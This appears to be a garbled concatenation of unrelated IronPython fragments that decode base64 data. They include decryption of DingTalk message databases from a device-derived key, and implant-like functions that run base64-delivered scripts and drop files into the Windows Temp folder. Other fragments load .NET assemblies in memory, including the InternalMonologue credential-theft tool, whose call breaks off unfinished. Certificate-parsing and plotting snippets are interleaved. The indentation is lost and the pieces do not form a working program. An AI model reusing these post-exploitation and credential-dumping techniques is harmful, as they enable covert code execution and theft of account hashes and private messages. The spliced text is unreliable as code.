def check_key(key, src):
rm = RijndaelManaged()
rm.Key = Convert.FromBase64String(base64.b64encode(key))
rm.Mode = CipherMode.ECB
rm.Padding = PaddingMode.None
tr = rm.CreateDecryptor()
data = src.Data
data.seek(0)
bts = data.read(16)
bts = Convert.FromBase64String(base64.b64encode(bts))
t_r = tr.TransformFinalBlock(bts, 0, 16)
name = str(bytes(t_r))
print name
if name != "SQLite format 3\0":
return False
return True
def aes_decrypt(src, dst, key):
rm = RijndaelManaged()
rm.Key = Convert.FromBase64String(base64.b64encode(key))
rm.Mode = CipherMode.ECB
rm.Padding = PaddingMode.None
tr = rm.CreateDecryptor()
f = open(dst, 'wb')
data = src.Data
sz = src.Size
idx = 0
while idx < sz:
bts = data.read(16)
bts = Convert.FromBase64String(base64.b64encode(bts))
t_r = tr.TransformFinalBlock(bts, 0, 16)
f.write(t_r)
idx += 16
f.close()
def run_script(self, data):
script = Encoding.UTF8.GetString(Convert.FromBase64String(data))
stream = MuhStream()
engine = Python.CreateEngine()
engine.Runtime.IO.SetOutput(stream, Encoding.UTF8)
engine.Runtime.IO.SetErrorOutput(stream, Encoding.UTF8)
#scope = engine.CreateScope()
#scope.SetVariable("client", self)
engine.Execute(script)
return stream.string
def decode_job(self, job):
buffer = Convert.FromBase64String(job['data'])
buffer[:2] = Array[Byte](bytearray(b"\x1f\x8b"))
with MemoryStream(buffer.Length) as compressedStream:
compressedStream.Write(buffer, 0, buffer.Length)
compressedStream.Seek(0, SeekOrigin.Begin)
with GZipStream(compressedStream,
CompressionMode.Decompress) as zipStream:
with MemoryStream() as resultStream:
zipStream.CopyTo(resultStream)
return JavaScriptSerializer().DeserializeObject(
Encoding.UTF8.GetString(resultStream.ToArray()))
def DecodeBase64File(Data, FileName, FilePath="C:\\WINDOWS\\Temp\\"):
path = "{}{}".format(FilePath, FileName)
File.WriteAllBytes(path, Convert.FromBase64String(Data))
return 'File copied to: {}'.format(path)
from System.Reflection import Assembly
from System.Text import Encoding
from System import Array, Object, String, Convert, Console
from System.IO import StreamWriter, MemoryStream
encoded_assembly = "ASSEMBLY_BASE64"
assembly = Assembly.Load(Convert.FromBase64String(encoded_assembly))
args = Array[Object]([Array[String](["ARGS"])])
# For some reason if we don't set the console output back to stdout after executing the assembly IronPython throws a fit
orig_out = Console.Out
orig_error = Console.Error
with MemoryStream() as ms:
with StreamWriter(ms) as sw:
Console.SetOut(sw)
Console.SetError(sw)
assembly.EntryPoint.Invoke(None, args)
sw.Flush()
buffer = ms.ToArray()
print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
Console.SetOut(orig_out)
Console.SetError(orig_error)
def parse(self):
def getvalue(tag):
value = ''
try:
value = tag.replace('\n', '').replace('\r', '').replace('\t', '').replace('|', '/') \
.replace('"', '').replace(' ', '').replace('NULL', '').replace(';', ',')
except:
value = ''
return value
def get_oid(name):
text = ''
if name == '1.2.643.3.131.1.1':
text = 'INN'
elif name == '1.2.643.100.1':
text = 'OGRN'
elif name == '1.2.643.100.3':
text = 'SNILS'
elif name == '1.2.840.113549.1.9.2':
text = 'orgRequisites'
else:
text = name
return text
X509list = []
X509OIDsList = []
oid2name = x509.oid._OID_NAMES
X509Entity = {}
try:
data = Convert.FromBase64String(self.__base64)
temp_cert = X509Certificates.X509Certificate(data)
cert = x509.load_der_x509_certificate(bytes(temp_cert.GetRawCertData()),
default_backend())
data = None
X509Entity['serial'] = temp_cert.GetSerialNumberString()
temp_cert = None
# SubjectInfo
X509Entity['Subject_SNILS'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'SNILS'])
X509Entity['Subject_orgRequisites'] = ''.join(
[getvalue(x.value).replace('-', '/') for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'orgRequisites'])
requisites = X509Entity['Subject_orgRequisites'].replace('INN=', '').replace('KPP=', '')\
.replace('OGRN=', '').replace('ИНН=', '').replace('КПП=', '').replace('ОГРН=', '')\
.replace('ОГРНИП=', '').replace('OGRNIP', '').replace(' ', '').strip().split('/')
X509Entity['Subject_INN'] = ''
try:
if len(requisites[0]) == 10 or len(requisites[0]) == 12:
X509Entity['Subject_INN'] = requisites[0]
except:
X509Entity['Subject_INN'] = ''
if X509Entity['Subject_INN'] == '':
X509Entity['Subject_INN'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'INN'])
X509Entity['Subject_KPP'] = ''
try:
if len(requisites[1]) == 9:
X509Entity['Subject_KPP'] = requisites[1]
except:
X509Entity['Subject_KPP'] = ''
X509Entity['Subject_OGRN'] = ''
try:
if len(requisites[2]) == 13 or len(requisites[2]) == 15:
X509Entity['Subject_OGRN'] = requisites[2]
except:
X509Entity['Subject_OGRN'] = ''
if X509Entity['Subject_OGRN'] == '':
X509Entity['Subject_OGRN'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'OGRN'])
X509Entity['Subject_CommonName'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])
X509Entity['Subject_Department'] = '; '.join(
[getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(
x.oid.dotted_string)) == 'organizationalUnitName'])
X509Entity['Subject_region'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'stateOrProvinceName'])
X509Entity['Subject_city'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'localityName'])
X509Entity['Subject_streetAddress'] = ''.join(
[getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'streetAddress'])
X509Entity['Subject_email'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'emailAddress'])
X509Entity['Subject_User'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'surname'])
X509Entity['Subject_User'] += ' ' + ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(
x.oid.dotted_string)) == 'givenName'])
X509Entity['Subject_UserPost'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'title'])
X509Entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
# X509Entity['serial'] = str(hex(cert.serial_number))
X509Entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
X509Entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')
# IssuerInfo
X509Entity['Issuer_CN'] = ''.join([getvalue(x.value) for x in cert.issuer if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])
X509Entity['sign'] = self.__base64
try:
for x in cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE).value:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = x.dotted_string
X509OID['value'] = ''
X509OID['type'] = 'extensions'
X509OIDsList.append(X509OID)
except:
pass
for x in cert.subject.rdns:
for i in x:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = i.oid.dotted_string
X509OID['value'] = (getvalue(i.value) or '')
X509OID['type'] = 'subject'
X509OIDsList.append(X509OID)
for x in cert.issuer.rdns:
for i in x:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = i.oid.dotted_string
X509OID['value'] = (getvalue(i.value) or '')
X509OID['type'] = 'issuer'
X509OIDsList.append(X509OID)
X509list.append(X509Entity)
print(X509Entity['Thumb'])
except Exception as e:
print('error sign!')
pass
return X509list, X509OIDsList
def search_account(self):
pre_node = self.root.GetByPath(
'Library/Preferences/com.laiwang.DingTalk.plist')
if pre_node is None:
self.log_print('''Can't find preferences node, parse exits!''')
return
bp = BPReader(pre_node.Data).top
# pass...
#device_id = bp['UTDID']['UTDID'].Value
b = bp['UTDID']
if b is None:
self.log_print("EXCEPTION OF NONE DATA!")
return
device_id = bp['UTDID']['UTDID'].Value
abs_path = self.root.PathWithMountPoint
sql_dir = os.path.join(abs_path, 'Documents/db')
k = os.listdir(sql_dir)
scops = list()
for i in k:
res = self.check_is_md5(i)
if res:
res = os.path.exists(
os.path.join(sql_dir, '{}/db.sqlite'.format(i)))
if res:
scops.append(i)
#self.log_print('''total find %d accounts''' % len(scops))
if self.is_scripts:
cache = ds.OpenCachePath('Dingtalk')
else:
cache = "D:/cache"
for i in scops:
r = device_id + i
hash_code = hashlib.md5(r).hexdigest()
key = hash_code[8:24]
dest_sql = os.path.join(cache, '{}.sqlite'.format(i))
dest_sql_fts = os.path.join(cache, '{}.sqlite_fts'.format(i))
f_dest = open(dest_sql, 'wb')
f_dest_fts = open(dest_sql_fts, 'wb')
source_node = self.root.GetByPath(
'Documents/db/{}/db.sqlite'.format(i))
source_node_fts = self.root.GetByPath(
'Documents/db/{}/db.sqlite_fts'.format(i))
if source_node is None:
continue
data = source_node.Data
sz = source_node.Size
idx = 0
print(key)
rm = RijndaelManaged()
rm.Key = Convert.FromBase64String(base64.b64encode(key))
rm.Mode = CipherMode.ECB
rm.Padding = PaddingMode.None
tr = rm.CreateDecryptor()
while idx < sz:
# if canceller.IsCancellationRequested:
# f_dest.close()
# os.remove(dest_sql)
# raise IOError('f****d')
bts = data.read(16)
bts = Convert.FromBase64String(base64.b64encode(bts))
t_r = tr.TransformFinalBlock(bts, 0, 16)
f_dest.write(t_r)
idx += 16
f_dest.close()
self.result_sql.append(dest_sql)
# for further using...
if source_node_fts is None:
continue
sz = source_node_fts.Size
data = source_node_fts.Data
idx = 0
while idx < sz:
# if canceller.IsCancellationRequested:
# f_dest_fts.close()
# os.remove(dest_sql_fts)
# raise IOError('f****d')
bts = data.read(16)
bts = Convert.FromBase64String(base64.b64encode(bts))
t_r = tr.TransformFinalBlock(bts, 0, 16)
f_dest_fts.write(t_r)
idx += 16
def parse(**kwargs):
# Объявляем списки для хранения словарей и пространство OID-имён
X509list = []
X509OIDsList = []
oid2name = x509.oid._OID_NAMES
# Объявляем словарь-контейнер для хранения данных сертификата
X509Entity = {}
try:
# Читаем файл и загружаем в массив байтов
data = Convert.FromBase64String(kwargs['sign'])
data = X509Certificates.X509Certificate(data)
X509Entity['serial'] = data.GetSerialNumberString()
X509Entity['sign'] = kwargs['sign']
cert = x509.load_der_x509_certificate(bytes(data.GetRawCertData()), default_backend())
data = None
# SubjectInfo
X509Entity['Subject_SNILS'] = ''.join(
[getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'SNILS'])
X509Entity['Subject_orgRequisites'] = ''.join([getvalue(x.value).replace('-', '/') for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'orgRequisites'])
requisites = X509Entity['Subject_orgRequisites'].replace('INN=', '') \
.replace('KPP=', '').replace('OGRN=', '').replace('ИНН=', '').replace('КПП=', '') \
.replace('ОГРН=', '').replace('ОГРНИП=', '').replace('OGRNIP', '') \
.replace(' ', '').strip().split('/')
X509Entity['Subject_INN'] = ''
try:
if len(requisites[0]) == 10 or len(requisites[0]) == 12:
X509Entity['Subject_INN'] = requisites[0]
except Exception as exc:
X509Entity['Subject_INN'] = ''
if X509Entity['Subject_INN'] == '':
X509Entity['Subject_INN'] = ''.join(
[getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'INN'])
X509Entity['Subject_KPP'] = ''
try:
if len(requisites[1]) == 9:
X509Entity['Subject_KPP'] = requisites[1]
except Exception as exc:
X509Entity['Subject_KPP'] = ''
X509Entity['Subject_OGRN'] = ''
try:
if len(requisites[2]) == 13 or len(requisites[2]) == 15:
X509Entity['Subject_OGRN'] = requisites[2]
except Exception as exc:
X509Entity['Subject_OGRN'] = ''
if X509Entity['Subject_OGRN'] == '':
X509Entity['Subject_OGRN'] = ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'OGRN'])
X509Entity['Subject_CommonName'] = ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(
x.oid.dotted_string)) == 'commonName'])
department = []
for x in cert.subject:
if (oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'organizationalUnitName':
if getvalue(x.value) not in department:
department.append(getvalue(x.value))
X509Entity['Subject_Department'] = '; '.join(department)
X509Entity['Subject_region'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'stateOrProvinceName'])
X509Entity['Subject_city'] = ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'localityName'])
X509Entity['Subject_streetAddress'] = ''.join([getvalue(x.value) for x in cert.subject if (
oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'streetAddress'])
X509Entity['Subject_email'] = ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'emailAddress'])
X509Entity['Subject_User'] = ''.join(
[getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'surname'])
X509Entity['Subject_User'] += ' ' + ''.join([getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(
x.oid.dotted_string)) == 'givenName'])
X509Entity['Subject_UserPost'] = ''.join(
[getvalue(x.value) for x in cert.subject if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'title'])
X509Entity['Thumb'] = str(cert.fingerprint(hashes.SHA1()).hex().upper())
X509Entity['ValidFrom'] = cert.not_valid_before.strftime('%Y-%m-%d')
X509Entity['ValidTo'] = cert.not_valid_after.strftime('%Y-%m-%d')
# IssuerInfo
X509Entity['Issuer_CN'] = ''.join([getvalue(x.value) for x in cert.issuer if
(oid2name.get(x.oid) or get_oid(x.oid.dotted_string)) == 'commonName'])
try:
for x in cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE).value:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = x.dotted_string
X509OID['value'] = ''
X509OID['type'] = 'extensions'
X509OIDsList.append(X509OID)
except Exception as exc:
pass
for x in cert.subject.rdns:
for i in x:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = i.oid.dotted_string
X509OID['value'] = (getvalue(i.value) or '')
X509OID['type'] = 'subject'
X509OIDsList.append(X509OID)
for x in cert.issuer.rdns:
for i in x:
X509OID = {}
X509OID['Thumb'] = X509Entity['Thumb']
X509OID['oid'] = i.oid.dotted_string
X509OID['value'] = (getvalue(i.value) or '')
X509OID['type'] = 'issuer'
X509OIDsList.append(X509OID)
X509list.append(X509Entity)
print(X509Entity['Thumb'])
except Exception as exc:
pass
if len(X509list) > 0:
kwargs['mutex'].acquire()
kwargs['certificates'].extend(X509list)
kwargs['oids'].extend(X509OIDsList)
kwargs['mutex'].release()
def set_plot(self, fig):
base64string = base64_fig(fig)
imagebytes = Convert.FromBase64String(base64string)
image = stream_bitmap(imagebytes)
self.PlotImage.Source = image
with MemoryStream(compressed.Length) as inputStream:
inputStream.Write(compressed, 0, compressed.Length)
inputStream.Seek(0, SeekOrigin.Begin)
with MemoryStream() as outputStream:
with DeflateStream(inputStream, CompressionMode.Decompress) as deflateStream:
buffer = Array.CreateInstance(Byte, 4096)
bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
outputStream.Write(buffer, 0, bytesRead)
while bytesRead != 0:
bytesRead = deflateStream.Read(buffer, 0, buffer.Length)
outputStream.Write(buffer, 0, bytesRead)
return outputStream.ToArray()
assembly = Assembly.Load(Decompress(Convert.FromBase64String(InternalMonologueDLL)))
clr.AddReference(assembly)
from InternalMonologue.Class1 import Main
orig_out = Console.Out
orig_error = Console.Error
with MemoryStream() as ms:
with StreamWriter(ms) as sw:
Console.SetOut(sw)
Console.SetError(sw)
Main(impersonate=,
threads=,
downgrade=,
restore=,
challenge=,
